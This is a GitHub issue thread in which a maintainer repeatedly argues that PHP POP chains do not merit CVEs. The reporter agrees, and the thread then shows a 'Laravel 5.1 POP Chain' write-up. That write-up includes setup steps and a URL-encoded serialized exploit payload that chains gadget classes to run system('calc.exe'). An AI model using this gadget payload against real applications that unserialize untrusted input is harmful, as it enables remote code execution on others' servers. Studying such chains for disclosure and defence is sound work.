Open beicheng-maker opened 1 year ago
Hello @beicheng-maker,
Would you please not request new CVE for POP chains? 🌺 POP chains mislead the users and MITRE will revoke the CVEs. We discussed it here and here.
Same for https://github.com/beicheng-maker/vulns/issues/3 and https://github.com/beicheng-maker/vulns/issues/5
Thank you, Regards, Mirhossein
Hello!
Dear @beicheng-maker,
I mean: CVEs are NOT for POP chains. POP chains are NOT vulnerabilities and they should NOT have CVEs. MITRE will revoke all POP chain-related CVEs.
If you find an untrusted input in the unserialize
function in any software, it's a vulnerability and you can request a CVE for it.
But if you find a POP chain and used your own unserialize
function, it is NOT a vulnerability and please don't request MITRE to issue a CVE for it.
If you have any questions, I can answer them.
CC: @Y4tacker, @guoyanan1g.
Thank you 🌸, Regards, Mirhossein
Hello!
Dear @beicheng-maker,
I mean: CVEs are NOT for POP chains. POP chains are NOT vulnerabilities and they should NOT have CVEs. MITRE will revoke all POP chain-related CVEs.
If you find an untrusted input in the
unserialize
function in any software, it's a vulnerability and you can request a CVE for it.But if you find a POP chain and used your own
unserialize
function, it is NOT a vulnerability and please don't request MITRE to issue a CVE for it.If you have any questions, I can answer them.
CC: @Y4tacker, @guoyanan1g.
Thank you 🌸, Regards, Mirhossein
ok thank you very much for your answer and have a nice life
Laravel 5.1 POP Chain
composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"
app/Http/Controllers/UsersController.php adding a controller UsersController
routes/web.php
Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);
EXP
O%3A42%3A%22SebastianBergmann%5CRecursionContext%5CContext%22%3A1%3A%7Bs%3A50%3A%22%00SebastianBergmann%5CRecursionContext%5CContext%00arrays%22%3BO%3A42%3A%22Illuminate%5CView%5CInvokableComponentVariable%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00callable%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A28%3A%22Illuminate%5CAuth%5CRequestGuard%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00provider%22%3Bs%3A8%3A%22calc.exe%22%3Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A14%3A%22call_user_func%22%3Bs%3A10%3A%22%00%2A%00request%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A4%3A%22user%22%3B%7D%7D%7D